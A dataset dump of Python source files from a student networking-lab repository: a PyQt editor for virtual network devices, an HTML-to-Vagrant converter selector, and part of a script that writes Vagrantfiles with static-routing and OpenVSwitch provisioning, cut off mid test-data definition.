form_0_0_layout.addWidget(edit_lines[\"device_name_box\"])\n \n form_0_1 = QtWidgets.QWidget()\n form_0_1_layout = QtWidgets.QHBoxLayout()\n form_0_1.setLayout(form_0_1_layout)\n edit_lines[\"vm_image\"] = QtWidgets.QLineEdit()\n edit_lines[\"vm_image\"].textChanged[str].connect(lambda: (self.temporary_edits(\"vm_image\", edit_lines[\"vm_image\"].text(), devices, devices_combobox.currentIndex())))\n form_0_1_layout.addWidget(QtWidgets.QLabel(\"Image OS: \"))\n form_0_1_layout.addWidget(edit_lines[\"vm_image\"])\n \n \n form_layout.addWidget(form_0_0, 0, 0)\n form_layout.addWidget(form_0_1, 0, 1)\n \n \n form_1_0 = QtWidgets.QWidget()\n form_1_0_layout = QtWidgets.QHBoxLayout()\n form_1_0.setLayout(form_1_0_layout)\n edit_lines[\"ram\"] = QtWidgets.QLineEdit()\n edit_lines[\"ram\"].textChanged[str].connect(lambda: (self.temporary_edits(\"ram\", edit_lines[\"ram\"].text(), devices, devices_combobox.currentIndex())))\n form_1_0_layout.addWidget(QtWidgets.QLabel(\"RAM (MB): \"))\n form_1_0_layout.addWidget(edit_lines[\"ram\"])\n \n form_1_1 = QtWidgets.QWidget()\n form_1_1_layout = QtWidgets.QHBoxLayout()\n form_1_1.setLayout(form_1_1_layout)\n edit_lines[\"number_cpus\"] = QtWidgets.QLineEdit()\n edit_lines[\"number_cpus\"].textChanged[str].connect(lambda: (self.temporary_edits(\"n_cpus\", edit_lines[\"number_cpus\"].text(), devices, devices_combobox.currentIndex()))) \n form_1_1_layout.addWidget(QtWidgets.QLabel(\"Number of CPUs:\"))\n form_1_1_layout.addWidget(edit_lines[\"number_cpus\"])\n \n form_layout.addWidget(form_1_0, 1, 0)\n form_layout.addWidget(form_1_1, 1, 1)\n \n form_layout.addWidget(QtWidgets.QLabel(\"Network configuration:\"), 2, 0)\n \n network_configuration_table = QtWidgets.QTableWidget()\n network_configuration_table.setColumnCount(3)\n network_configuration_table_header = network_configuration_table.horizontalHeader()\n network_configuration_table_header.setSectionResizeMode(QtWidgets.QHeaderView.Stretch)\n network_configuration_table.setHorizontalHeaderLabels([\"Ip Address\", \"Netmask\", \"Interface\"])\n network_configuration_table.verticalHeader().hide()\n form_layout.addWidget(network_configuration_table, 3, 0, 1, 2)\n\n form_layout.addWidget(QtWidgets.QLabel(\"Custom script:\"), 4, 0)\n \n custom_script_textbox = QtWidgets.QTextEdit()\n form_layout.addWidget(custom_script_textbox, 5,0,1,2)\n custom_script_textbox.textChanged.connect(lambda: (self.temporary_edits(\"custom_script\", custom_script_textbox.toPlainText(), devices, devices_combobox.currentIndex())))\n\n\n self.set_qlines_text(edit_lines, devices, devices_combobox.currentIndex(), custom_script_textbox)\n self.set_network_table_content(network_configuration_table, devices, devices_combobox.currentIndex())\n network_configuration_table.cellChanged.connect(lambda: self.table_edits(network_configuration_table, devices, devices_combobox.currentIndex())) \n devices_combobox.activated[str].connect(lambda: (self.set_qlines_text(edit_lines, devices, devices_combobox.currentIndex(), custom_script_textbox), self.set_network_table_content(network_configuration_table, devices, devices_combobox.currentIndex())))\n\n window_layout.addWidget(devices_label)\n window_layout.addWidget(devices_combobox)\n window_layout.addWidget(form)\n else:\n tab_layout = QtWidgets.QVBoxLayout(tab)\n tab_layout.addWidget(QtWidgets.QLabel(\"No \" + type.lower() + \" devices available in the network\"))\n return tab\n\n def set_qlines_text(self, edit_lines, devices, index, custom_script_textbox):\n \"\"\"Method that applies all the current configuration values in the specific form.\n\n Parameters:\n - self: current instance of the class;\n - edit_lines: all the textboxes that contains the input from the user;\n - devices: temporary dictionary;\n - index: current device index.\n\n \"\"\"\n edit_lines[\"device_name_box\"].setText(devices[index][\"label\"])\n edit_lines[\"vm_image\"].setText(devices[index][\"vm_image\"])\n edit_lines[\"ram\"].setText(devices[index][\"ram\"])\n edit_lines[\"number_cpus\"].setText(str(devices[index][\"n_cpus\"]))\n custom_script_textbox.setPlainText(devices[index][\"custom_script\"])\n\n \n def set_network_table_content(self, table, devices, index):\n \"\"\"Method that applies all the current configuration values in the specific network configuration table.\n\n Parameters:\n - self: current instance of the class;\n - table: table that contains all the network interfaces configured in the current device;\n - devices: temporary dictionary;\n - index: current device index.\n\n \"\"\"\n network_row_count = len(devices[index][\"network_interfaces\"])\n table.setRowCount(network_row_count)\n network_column_count = len(devices[index][\"network_interfaces\"][0])\n \n for row in range(network_row_count):\n for column in range(network_column_count-1):\n item = (list(devices[index][\"network_interfaces\"][row].values())[column])\n table.setItem(row, column, QtWidgets.QTableWidgetItem(item))\n \n def temporary_edits(self, key, new_value, devices, index):\n \"\"\"Method called whenever a textbox content is modified. Every change is directly applied also to the temporary reference dictionary.\n\n Parameters:\n - self: current instance of the class;\n - key: characteristic that has been modified;\n - new_value: modified value;\n - devices: temporary dictionary;\n - index: current device index.\n\n \"\"\"\n if key == \"n_cpus\":\n if new_value == \"\":\n devices[index][key] = 0\n else:\n devices[index][key] = int(new_value)\n else:\n devices[index][key] = new_value\n \n def table_edits(self, table, devices, index):\n \"\"\"Method called whenever a cell of the network table is modified. Every change is directly applied also to the temporary reference dictionary.\n\n Parameters:\n - self: current instance of the class;\n - table: table where the change has been made;\n - devices: temporary dictionary;\n - index: current device index.\n\n \"\"\"\n if (type(table.currentItem()) != type(None)):\n if (table.currentItem().column()==0):\n devices[index][\"network_interfaces\"][table.currentItem().row()][\"ip_address\"] = table.currentItem().text()\n if (table.currentItem().column()==1):\n devices[index][\"network_interfaces\"][table.currentItem().row()][\"netmask\"] = table.currentItem().text()\n if (table.currentItem().column()==2):\n devices[index][\"network_interfaces\"][table.currentItem().row()][\"name_interface\"] = table.currentItem().text()\n \n \n def on_save(self):\n \"\"\"Method called when the user presses the save button in the editor configuration. It applies the changes in the temporary network and updates the network graph of the canvas.\n\n Parameters:\n - self: current instance of the class;\n\n \"\"\" \n G = Network()\n print(self.routers)\n print(self.switches)\n print(self.hosts)\n print(self.hosts)\n network_core.dictionary_to_nodes(self.routers, G)\n network_core.dictionary_to_nodes(self.switches, G)\n network_core.dictionary_to_nodes(self.hosts, G)\n network_core.dictionary_to_nodes(self.others, G)\n network_core.dictionary_to_edges(self.temporary_network.edges, G)\n self.main_window_object.current_network = G\n G.save_graph(\"./NetworkGraphs/Temp_Network/temp_network.html\")\n network_core.html_fix(os.path.abspath(\"./NetworkGraphs/Temp_Network/temp_network.html\"))\n self.main_window_object.update_canvas_html(os.path.abspath(\"./NetworkGraphs/Temp_Network/temp_network.html\"))\n self.main_window_object.ssh_window = ssh_connection(self.main_window_object)\n self.main_window_object.edge_window = edge_editors(self.main_window_object)\n \n self.close()\n \n def on_cancel(self):\n self.close()\n\n\nclass edge_editors(QtWidgets.QMainWindow):\n \n def __init__(self, main_window):\n super(edge_editors, self).__init__()\n self.main_window_object = main_window\n self.temporary_network = self.main_window_object.current_network\n self.setWindowIcon(QtGui.QIcon(\"./Images/edge.png\"))\n self.setWindowTitle(\"Edit edges configuration\")\n self.resize(512, 280)\n self.window_layout = QtWidgets.QGridLayout(self)\n self.edge_combobox = QtWidgets.QComboBox()\n self.edge_combobox.activated[str].connect(lambda: self.bandwidth_up_textbox.setText(str(self.edges[self.edge_combobox.currentIndex()][\"bandwidth_up\"])))\n self.edge_combobox.activated[str].connect(lambda: self.bandwidth_down_textbox.setText(str(self.edges[self.edge_combobox.currentIndex()][\"bandwidth_down\"])))\n self.collect_edges()\n self.bandwidth_up_textbox = QtWidgets.QLineEdit()\n self.bandwidth_up_textbox.textChanged[str].connect(lambda: (self.bandwidth_changes(self.edges, self.edge_combobox.currentIndex(), \"bandwidth_up\" , self.bandwidth_up_textbox.text())))\n self.bandwidth_down_textbox = QtWidgets.QLineEdit()\n self.bandwidth_down_textbox.textChanged[str].connect(lambda: (self.bandwidth_changes(self.edges, self.edge_combobox.currentIndex(), \"bandwidth_down\",self.bandwidth_down_textbox.text())))\n if len(self.edges) > 0:\n self.bandwidth_up_textbox.setText(str(self.edges[self.edge_combobox.currentIndex()][\"bandwidth_up\"]))\n self.bandwidth_down_textbox.setText(str(self.edges[self.edge_combobox.currentIndex()][\"bandwidth_down\"]))\n self.button_frame = QtWidgets.QWidget()\n self.button_layout = QtWidgets.QHBoxLayout()\n self.button_layout.setAlignment(QtCore.Qt.AlignRight)\n self.button_save = QtWidgets.QPushButton(\"Save\")\n self.button_save.clicked.connect(self.on_save)\n self.button_cancel = QtWidgets.QPushButton(\"Cancel\")\n self.button_cancel.clicked.connect(self.on_close)\n self.button_layout.addWidget(self.button_save)\n self.button_layout.addWidget(self.button_cancel)\n self.button_frame.setLayout(self.button_layout)\n self.window_layout.addWidget(QtWidgets.QLabel(\"Select the edge:\"), 0, 0)\n self.window_layout.addWidget(self.edge_combobox, 1, 0, 1, 2)\n self.window_layout.addWidget(QtWidgets.QLabel(\"Bandwidth uplink (kbps):\"), 2, 0)\n self.window_layout.addWidget(self.bandwidth_up_textbox, 2,1)\n self.window_layout.addWidget(QtWidgets.QLabel(\"Bandwidth downlink (kbps):\"), 3, 0)\n self.window_layout.addWidget(self.bandwidth_down_textbox, 3,1)\n self.window_layout.addItem(QtWidgets.QSpacerItem(400, 220), 4, 0, 1, 2)\n self.window_layout.addWidget(self.button_frame, 5, 0, 1, 2)\n self.window = QtWidgets.QWidget()\n self.window.setLayout(self.window_layout)\n self.setCentralWidget(self.window)\n\n \n def collect_edges(self):\n self.edges = self.temporary_network.edges\n self.devices = self.temporary_network.nodes\n print(self.edges)\n for edge in self.edges:\n self.edge_combobox.addItem(self.devices[edge[\"from\"]-1][\"label\"] + \" <----> \" + self.devices[edge[\"to\"]-1][\"label\"])\n \n def bandwidth_changes(self, edges, index, direction, new_value):\n if new_value == \"\":\n edges[index][direction] = 0\n else:\n edges[index][direction] = int(new_value)\n\n def on_save(self):\n \"\"\"Method called when the user presses the save button in the editor configuration. It applies the changes in the temporary network and updates the network graph of the canvas.\n\n Parameters:\n - self: current instance of the class;\n\n \"\"\" \n G = Network()\n network_core.dictionary_to_nodes(self.devices, G)\n network_core.dictionary_to_edges(self.edges, G)\n self.main_window_object.current_network = G\n G.save_graph(\"./NetworkGraphs/Temp_Network/temp_network.html\")\n network_core.html_fix(os.path.abspath(\"./NetworkGraphs/Temp_Network/temp_network.html\"))\n self.main_window_object.update_canvas_html(os.path.abspath(\"./NetworkGraphs/Temp_Network/temp_network.html\"))\n self.close()\n \n def on_close(self):\n self.close()\n\n\n\n\ndef main_application():\n application = QtWidgets.QApplication(sys.argv)\n user_interface = network_design_window()\n user_interface.show()\n sys.exit(application.exec_())\n\n"
},
{
"alpha_fraction": 0.6508525013923645,
"alphanum_fraction": 0.6560415029525757,
"avg_line_length": 32.625,
"blob_id": "72a56879bfa1226c018a9d3f58636588f3ae97b4",
"content_id": "9c32d735bee1c95a12f52089407b84938945d9c2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1349,
"license_type": "permissive",
"max_line_length": 118,
"num_lines": 40,
"path": "/fromHTMLtoVagrant/vagrantConverterCollector.py",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
"text": "import VagrantTopologyOSPF, VagrantTopologyMySQL, VagrantTopologySwitch, VagrantTopologyWebServer, VagrantTopology3S2H\nimport codecs\nimport yaml\n\n\ndef find_between( s, first, last ):\n try:\n start = s.index( first ) + len( first )\n end = s.index( last, start )\n return s[start:end]\n except ValueError:\n return \"\"\n\ndef extract_network(network_path):\n file = codecs.open(network_path, \"r\", \"utf-8\")\n html = file.read()\n\n if \"nodes = new vis.DataSet(\" in html:\n nodes = yaml.safe_load(find_between(html, \"nodes = new vis.DataSet(\" , \")\"))\n print(nodes)\n\n\n if \"edges = new vis.DataSet(\" in html:\n edges = yaml.safe_load(find_between(html, \"edges = new vis.DataSet(\", \")\"))\n print(edges)\n\n return nodes, edges\n\ndef converter_selector(network_path, template):\n nodes, edges = extract_network(network_path)\n if(template == \"OSPF\"):\n VagrantTopologyOSPF.html_to_vagrantfile(nodes, edges)\n if(template == \"MySQL\"):\n VagrantTopologyMySQL.html_to_vagrantfile(nodes, edges)\n if(template == \"Switch\"):\n VagrantTopologySwitch.html_to_vagrantfile(nodes, edges)\n if(template == \"WebServer\"):\n VagrantTopologyWebServer.html_to_vagrantfile(nodes, edges)\n if(template == \"3S2H\"):\n VagrantTopology3S2H.html_to_vagrantfile(nodes, edges) \n"
},
{
"alpha_fraction": 0.5369760394096375,
"alphanum_fraction": 0.5766746997833252,
"avg_line_length": 35.73023223876953,
"blob_id": "6fe5bb1b6a272587e717602ddfbec9e3f9567ef7",
"content_id": "f13727e855441cc3d886cd9f1de0ff15f31cfe08",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 15794,
"license_type": "permissive",
"max_line_length": 239,
"num_lines": 430,
"path": "/fromHTMLtoVagrant/OldScripts/VagrantTopologySwitch.py",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
"text": "import ipcalc \n\n#this function writes the beginning of the VagrantFile\ndef BeginVagrantFile(f,Network):\n print(\"writing the beginning of the vagrant file\")\n f.write(\"# -*- mode: ruby -*- \\n# vi: set ft=ruby :\\n\\n\")\n f.write(\"#All Vagrant configuration is done below. The 2 in Vagrant.configure\\n#configures the configuration version we support older styles for\\n#backwards compatibility. Please don't change it unless you know what\\n#you're doing.\\n\")\n f.write(\"Vagrant.configure(\\\"2\\\") do |config|\\n\")\n f.write(\"config.vm.box_check_update = true\\n\")\n f.write(\"config.vm.provider \\\"virtualbox\\\" do |vb|\\n\")\n f.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--usb\\\", \\\"on\\\"]\\n\")\n f.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--usbehci\\\", \\\"off\\\"]\\n\")\n f.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--nicpromisc2\\\", \\\"allow-all\\\"]\\n\")\n f.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--nicpromisc3\\\", \\\"allow-all\\\"]\\n\")\n f.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--nicpromisc4\\\", \\\"allow-all\\\"]\\n\")\n f.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--nicpromisc5\\\", \\\"allow-all\\\"]\\n\")\n f.write(\"vb.cpus = 1\\n\")\n f.write(\"end\\n\")\n\n\n#this function write in the vagrant file a new PC host\ndef writeHost(f,Host,Topology):\n\n print(\"adding an host to the vagrant file\")\n\n #extrapolate each attribute from the touples\n Id = Host[1][\"Id\"]\n Name = Host[1][\"Name\"]\n Os = Host[1][\"Os\"]\n Ram = Host[1][\"Ram\"]\n\n Ip = Host[1][\"Network\"][0][\"Ip\"]\n Netmask = Host[1][\"Network\"][0][\"Netmask\"]\n Interface = Host[1][\"Network\"][0][\"Interface\"]\n IpNoSub = Ip.split(\"/\")[0]\n\n Network = ipcalc.Network(Ip)\n IpNet = Network.network()\n\n Ip2 = Topology[4][1][\"Network\"][0][\"Ip\"]\n Mask2 = Topology[4][1][\"Network\"][0][\"Netmask\"]\n Network2 = ipcalc.Network(Ip2)\n IpNet2 = str(Network2.network())\n\n Ip3 = Topology[3][1][\"Network\"][0][\"Ip\"]\n Mask3 = Topology[3][1][\"Network\"][0][\"Netmask\"]\n Network3 = ipcalc.Network(Ip3)\n IpNet3 = str(Network3.network())\n\n Ip4 = Topology[3][1][\"Network\"][1][\"Ip\"]\n Mask4 = Topology[3][1][\"Network\"][1][\"Netmask\"]\n Network4 = ipcalc.Network(Ip4)\n IpNet4 = str(Network4.network())\n\n Ip8 = Topology[5][1][\"Network\"][0][\"Ip\"]\n Mask8 = Topology[5][1][\"Network\"][0][\"Netmask\"]\n Network8 = ipcalc.Network(Ip8)\n IpNet8 = str(Network8.network())\n\n Ip12 = Topology[5][1][\"Network\"][1][\"Ip\"]\n Mask12 = Topology[5][1][\"Network\"][1][\"Netmask\"]\n Network12 = ipcalc.Network(Ip12)\n IpNet12 = str(Network12.network())\n\n if Id is 1:\n Gateway = Ip8.split(\"/\")[0]\n\n if Id is 2:\n Gateway = Ip12.split(\"/\")[0]\n\n if Id is 3:\n Gateway = Ip2.split(\"/\")[0]\n\n f.write(\"config.vm.define \\\"\" + Name + \"\\\" do |\" + Name + \"|\\n\")\n f.write(Name + \".vm.box = \\\"\" + Os +\"\\\"\\n\")\n f.write(Name + \".vm.hostname = \\\"\" + Name + \"\\\"\\n\")\n if Id is 1:\n f.write(Name + \".vm.network \\\"private_network\\\", ip: \\\"\" + IpNoSub + \"\\\", netmask: \\\"\" + Netmask + \"\\\", virtualbox__intnet: \\\"broadcast_host_\" + Name + \"\\\", auto_config: true\\n\")\n if Id is 2:\n f.write(Name + \".vm.network \\\"private_network\\\", ip: \\\"\" + IpNoSub + \"\\\", netmask: \\\"\" + Netmask + \"\\\", virtualbox__intnet: \\\"broadcast_host_\" + Name + \"\\\", auto_config: true\\n\")\n if Id is 3:\n f.write(Name + \".vm.network \\\"private_network\\\", ip: \\\"\" + IpNoSub + \"\\\", netmask: \\\"\" + Netmask + \"\\\", virtualbox__intnet: \\\"broadcast_router-south-2\\\", auto_config: true\\n\") \n f.write(\"#.vm.provision \\\"shell\\\", inline: <<-SHELL\\n\")\n f.write(\"#echo \\\"Installation of Lynx Text-Based Browser to access the Web-Server via terminal on \" + Name + \"\\\"\\n\")\n f.write(\"#sudo apt-get update\\n\")\n f.write(\"#sudo apt-get install -y lynx\\n\")\n f.write(\"#echo \\\"Lynx-Browser is installed\\\"\\n\")\n f.write(\"#SHELL\\n\")\n f.write(Name + \".vm.provision \\\"shell\\\", run: \\\"always\\\", inline: <<-SHELL\\n\")\n f.write(\"echo \\\"Static Routig configuration Started for \" + Name + \"\\\"\\n\")\n f.write(\"sudo sysctl -w net.ipv4.ip_forward=1\\n\")\n\n f.write(\"sudo route add -net \" + IpNet2 + \" netmask \" + Mask2 + \" gw \" + Gateway + \" dev \" + Interface + \"\\n\")\n f.write(\"sudo route add -net \" + IpNet3 + \" netmask \" + Mask3 + \" gw \" + Gateway + \" dev \" + Interface + \"\\n\")\n f.write(\"sudo route add -net \" + IpNet4 + \" netmask \" + Mask4 + \" gw \" + Gateway + \" dev \" + Interface + \"\\n\") \n\n if Id is 1: \n f.write(\"sudo route add -net \"+ IpNet12 + \" netmask \" + Mask12 + \" gw \" + Gateway + \" dev \" + Interface + \"\\n\")\n\n if Id is 2:\n f.write(\"sudo route add -net \" + IpNet8 + \" netmask \" + Mask8 + \" gw \" + Gateway + \" dev \" + Interface + \"\\n\")\n \n if Id is 3: \n f.write(\"sudo route add -net \" + IpNet8 + \" netmask \" + Mask8 + \" gw \" + Gateway + \" dev \" + Interface + \"\\n\")\n f.write(\"sudo route add -net \" + IpNet12 + \" netmask \" + Mask12 + \" gw \" + Gateway + \" dev \" + Interface + \"\\n\")\n \n f.write(\"echo \\\"Configuration END\\\"\\n\")\n f.write(\"echo \\\"\" + Name + \" is ready to Use\\\"\\n\")\n f.write(\"SHELL\\n\")\n if Id is 3:\n f.write(Name + \".vm.provision \\\"shell\\\", inline: <<-SHELL\\n\")\n f.write(\"echo \\\"Installation of Web-Server\\\"\\n\")\n f.write(\"sudo apt-get update\\n\")\n f.write(\"sudo apt-get install -y apache2\\n\")\n f.write(\"echo \\\"Web-ServerServer is installed and Runing\\\"\\n\")\n f.write(\"SHELL\\n\")\n f.write(Name + \".vm.provider \\\"virtualbox\\\" do |vb|\\n\")\n f.write(\"vb.memory = \" + Ram + \"\\n\")\n f.write(\"end\\n\")\n f.write(\"end\\n\")\n\n\n\n\n#this function write in the vagrant file a new Router\ndef writeRouter(f,Router,Topology):\n\n print(\"adding a router to the vagrant file\")\n\n #extrapolate each attribute from the touples\n Id = Router[1][\"Id\"]\n Name = Router[1][\"Name\"]\n Ram = Router[1][\"Ram\"]\n Os = Router[1][\"Os\"]\n\n Ip1 = Router[1][\"Network\"][0][\"Ip\"]\n Netmask1 = Router[1][\"Network\"][0][\"Netmask\"]\n Interface1 = Router[1][\"Network\"][0][\"Interface\"]\n IpNoSub1 = Ip1.split(\"/\")[0]\n\n Ip2 = Router[1][\"Network\"][1][\"Ip\"]\n Netmask2 = Router[1][\"Network\"][1][\"Netmask\"]\n Interface2 = Router[1][\"Network\"][1][\"Interface\"]\n IpNoSub2 = Ip2.split(\"/\")[0]\n\n if Id is 4: \n tag = \"1\"\n if Id is 5: \n tag = \"2\" \n\n Ip2 = Topology[4][1][\"Network\"][0][\"Ip\"]\n Mask2 = Topology[4][1][\"Network\"][0][\"Netmask\"]\n Network2 = ipcalc.Network(Ip2)\n IpNet2 = str(Network2.network())\n\n Ip3 = Topology[5][1][\"Network\"][2][\"Ip\"]\n Mask3 = Topology[5][1][\"Network\"][2][\"Netmask\"]\n Network3 = ipcalc.Network(Ip3)\n IpNet3 = str(Network3.network())\n\n Ip8 = Topology[5][1][\"Network\"][0][\"Ip\"]\n Mask8 = Topology[5][1][\"Network\"][0][\"Netmask\"]\n Network8 = ipcalc.Network(Ip8)\n IpNet8 = str(Network8.network())\n\n Ip12 = Topology[5][1][\"Network\"][1][\"Ip\"]\n Mask12 = Topology[5][1][\"Network\"][1][\"Netmask\"]\n Network12 = ipcalc.Network(Ip12)\n IpNet12 = str(Network12.network())\n\n GatewaySwitch = Topology[5][1][\"Network\"][2][\"Ip\"]\n GatewaySwitch = GatewaySwitch.split(\"/\")[0]\n\n GatewayRouter1 = Topology[3][1][\"Network\"][1][\"Ip\"]\n GatewayRouter1 = GatewayRouter1.split(\"/\")[0]\n\n GatewayRouter2 = Topology[4][1][\"Network\"][1][\"Ip\"]\n GatewayRouter2 = GatewayRouter2.split(\"/\")[0]\n\n\n\n f.write(\"config.vm.define \\\"\" + Name+ \"\\\" do |\" + Name + \"|\\n\")\n f.write(Name + \".vm.box = \\\"\" + Os + \"\\\"\\n\")\n f.write(Name + \".vm.hostname = \\\"\" + Name + \"\\\"\\n\")\n\n f.write(Name + \".vm.network \\\"private_network\\\", ip: \\\"\" + IpNoSub1 + \"\\\", netmask: \\\"\" + Netmask1 + \"\\\", virtualbox__intnet: \\\"broadcast_router-south-\" + tag + \"\\\", auto_config: true\\n\")\n f.write(Name + \".vm.network \\\"private_network\\\", ip: \\\"\" + IpNoSub2 + \"\\\", netmask: \\\"\" + Netmask2 + \"\\\", virtualbox__intnet: \\\"broadcast_router-inter\\\", auto_config: true\\n\")\n f.write(Name + \".vm.provision \\\"shell\\\", run: \\\"always\\\", inline: <<-SHELL\\n\")\n f.write(\"echo \\\"Static Routig configuration Started\\\"\\n\")\n f.write(\"sudo sysctl -w net.ipv4.ip_forward=1\\n\")\n\n if Id is 4: \n f.write(\"sudo route add -net \" + IpNet2 + \" netmask \" + Mask2 + \" gw \" + GatewayRouter2 + \" dev \" + Interface2 + \"\\n\")\n f.write(\"sudo route add -net \" + IpNet8 + \" netmask \" + Mask8 + \" gw \" + GatewaySwitch + \" dev \" + Interface1 + \"\\n\")\n f.write(\"sudo route add -net \" + IpNet12 + \" netmask \" + Mask12 + \" gw \" + GatewaySwitch + \" dev \" + Interface1 + \"\\n\")\n\n\n if Id is 5: \n f.write(\"sudo route add -net \" + IpNet3 + \" netmask \" + Mask3 + \" gw \" + GatewayRouter1 + \" dev \" + Interface2 + \"\\n\")\n f.write(\"sudo route add -net \" + IpNet8 + \" netmask \" + Mask8 + \" gw \" + GatewayRouter1 + \" dev \" + Interface2 + \"\\n\")\n f.write(\"sudo route add -net \" + IpNet12 + \" netmask \" + Mask12 + \" gw \" + GatewayRouter1 + \" dev \" + Interface2 + \"\\n\")\n\n \n f.write(\"echo \\\"Configuration END\\\"\\n\")\n f.write(\"echo \\\"\" + Name + \" is ready to Use\\\"\\n\")\n f.write(\"SHELL\\n\")\n f.write(Name + \".vm.provider \\\"virtualbox\\\" do |vb|\\n\")\n f.write(\"vb.memory = \" + Ram + \"\\n\")\n f.write(\"end\\n\")\n f.write(\"end\\n\")\n\n#this function write in the vagrant file a new Router\ndef writeSwitch(f,Switch,Topology):\n\n #extrapolate each attribute from the touples\n Name = Switch[1][\"Name\"]\n Ram = Switch[1][\"Ram\"]\n Os = Switch[1][\"Os\"]\n\n IpA = Switch[1][\"Network\"][0][\"Ip\"]\n NetmaskA = Switch[1][\"Network\"][0][\"Netmask\"]\n InterfaceA = Switch[1][\"Network\"][0][\"Interface\"]\n\n IpB = Switch[1][\"Network\"][1][\"Ip\"]\n NetmaskB = Switch[1][\"Network\"][1][\"Netmask\"]\n InterfaceB = Switch[1][\"Network\"][1][\"Interface\"]\n\n IpSW = Switch[1][\"Network\"][2][\"Ip\"]\n NetmaskSW = Switch[1][\"Network\"][2][\"Netmask\"]\n InterfaceSW = Switch[1][\"Network\"][2][\"Interface\"]\n\n Gateway = Topology[3][1][\"Network\"][0][\"Ip\"]\n Gateway = Gateway.split(\"/\")[0]\n\n Ip2 = Topology[4][1][\"Network\"][0][\"Ip\"]\n Mask2 = Topology[4][1][\"Network\"][0][\"Netmask\"]\n Network2 = ipcalc.Network(Ip2)\n IpNet2 = str(Network2.network())\n\n Ip4 = Topology[3][1][\"Network\"][1][\"Ip\"]\n Mask4 = Topology[3][1][\"Network\"][1][\"Netmask\"]\n Network4 = ipcalc.Network(Ip4)\n IpNet4 = str(Network4.network())\n\n\n print(\"adding a switch to the vagrant file\")\n f.write(\"config.vm.define \\\"\" + Name + \"\\\" do |\" + Name + \"|\\n\")\n f.write(Name + \".vm.box = \\\"\" + Os +\"\\\"\\n\")\n f.write(Name + \".vm.hostname = \\\"\" + Name + \"\\\"\\n\")\n f.write(Name + \".vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_router-south-1\\\", auto_config: false\\n\")\n f.write(Name + \".vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_host_\" + Topology[0][1][\"Name\"] + \"\\\", auto_config: false\\n\")\n f.write(Name + \".vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_host_\" + Topology[1][1][\"Name\"] + \"\\\", auto_config: false\\n\")\n f.write(Name + \".vm.provision \\\"shell\\\", inline: <<-SHELL\\n\")\n f.write(\"echo \\\"OpenVSwitch Installation is started\\\"\\n\")\n f.write(\"apt-get update\\n\")\n f.write(\"apt-get install -y tcpdump\\n\")\n f.write(\"apt-get install -y openvswitch-common openvswitch-switch apt-transport-https ca-certificates curl software-properties-common\\n\")\n f.write(\"echo \\\"OpenVSwitch Bridge Configuration Started\\\"\\n\")\n f.write(\"sudo ovs-vsctl add-br SW1\\n\")\n f.write(\"sudo ovs-vsctl add-br HA\\n\")\n f.write(\"sudo ovs-vsctl add-br HB\\n\")\n f.write(\"sudo ovs-vsctl add-port SW1 eth1\\n\")\n f.write(\"sudo ovs-vsctl add-port HA eth2\\n\")\n f.write(\"sudo ovs-vsctl add-port HB eth3\\n\")\n f.write(\"echo \\\"Bridge configuration END\\\"\\n\")\n f.write(\"SHELL\\n\")\n f.write(Name + \".vm.provision \\\"shell\\\", run: \\\"always\\\", inline: <<-SHELL\\n\")\n f.write(\"echo \\\"OpenVSwitch Ip addressing is started\\\"\\n\")\n f.write(\"sudo ifconfig SW1 \" + IpSW + \"\\n\")\n f.write(\"sudo ifconfig HA \" + IpA + \"\\n\")\n f.write(\"sudo ifconfig HB \" + IpB + \"\\n\")\n f.write(\"sudo ifconfig SW1 up\\n\")\n f.write(\"sudo ifconfig HA up\\n\")\n f.write(\"sudo ifconfig HB up\\n\")\n f.write(\"sudo ifconfig eth1 up\\n\")\n f.write(\"sudo ifconfig eth2 up\\n\")\n f.write(\"sudo ifconfig eth3 up\\n\")\n f.write(\"sudo sysctl -w net.ipv4.ip_forward=1\\n\")\n f.write(\"sudo route add -net \" + IpNet2 +\" netmask \" + Mask2 + \" gw \" + Gateway + \" dev \" + InterfaceSW + \"\\n\")\n f.write(\"sudo route add -net \" + IpNet4 +\" netmask \" + Mask4 + \" gw \" + Gateway + \" dev \" + InterfaceSW + \"\\n\")\n f.write(\"echo \\\"Configuration END\\\"\\n\")\n f.write(\"echo \\\"\"+ Name + \" is ready to Use\\\"\\n\")\n f.write(\"SHELL\\n\")\n f.write(Name + \".vm.provider \\\"virtualbox\\\" do |vb|\\n\")\n # User can select the desired menmory for the machine. we must allow them\n f.write(\"vb.memory = \" + Ram +\"\\n\")\n f.write(\"end\\n\")\n f.write(\"end\\n\")\n \n \n\n \n\n\n\n\n#the following is a fake graph that i used for testing\n#instead of typing everytime the input in the command line\nhost1 = (1,{\n \"Id\" : 1,\n \"Name\":\"host1\",\n \"Type\": \"Host\",\n \"Ram\": \"1024\",\n \"Os\": \"bento/ubuntu-16.04\",\n \"Network\" : [{\n \"Ip\": \"172.16.8.5/22\",\n \"Netmask\": \"255.255.252.0\",\n \"Interface\" : \"eth1\"\n }]\n})\nhost2 = (2,{\n \"Id\" : 2,\n \"Name\":\"host2\",\n \"Type\": \"Host\",\n \"Ram\": \"1024\",\n \"Os\": \"bento/ubuntu-16.04\",\n \"Network\" : [{\n \"Ip\": \"172.16.12.5/22\",\n \"Netmask\": \"255.255.252.0\",\n \"Interface\" : \"eth1\"\n }]\n})\nhost3 = (3,{\n \"Id\" : 3,\n \"Name\":\"host3\",\n \"Type\": \"Host\",\n \"Ram\": \"1024\",\n \"Os\": \"bento/ubuntu-16.04\",\n \"Network\" : [{\n \"Ip\": \"172.16.2.5/24\",\n \"Netmask\": \"255.255.255.0\",\n \"Interface\" : \"eth1\"\n }]\n})\n\nrout1 = (4,{\n \"Id\" : 4,\n \"Name\": \"router1\",\n \"Type\": \"Router\",\n \"Ram\": \"1024\",\n 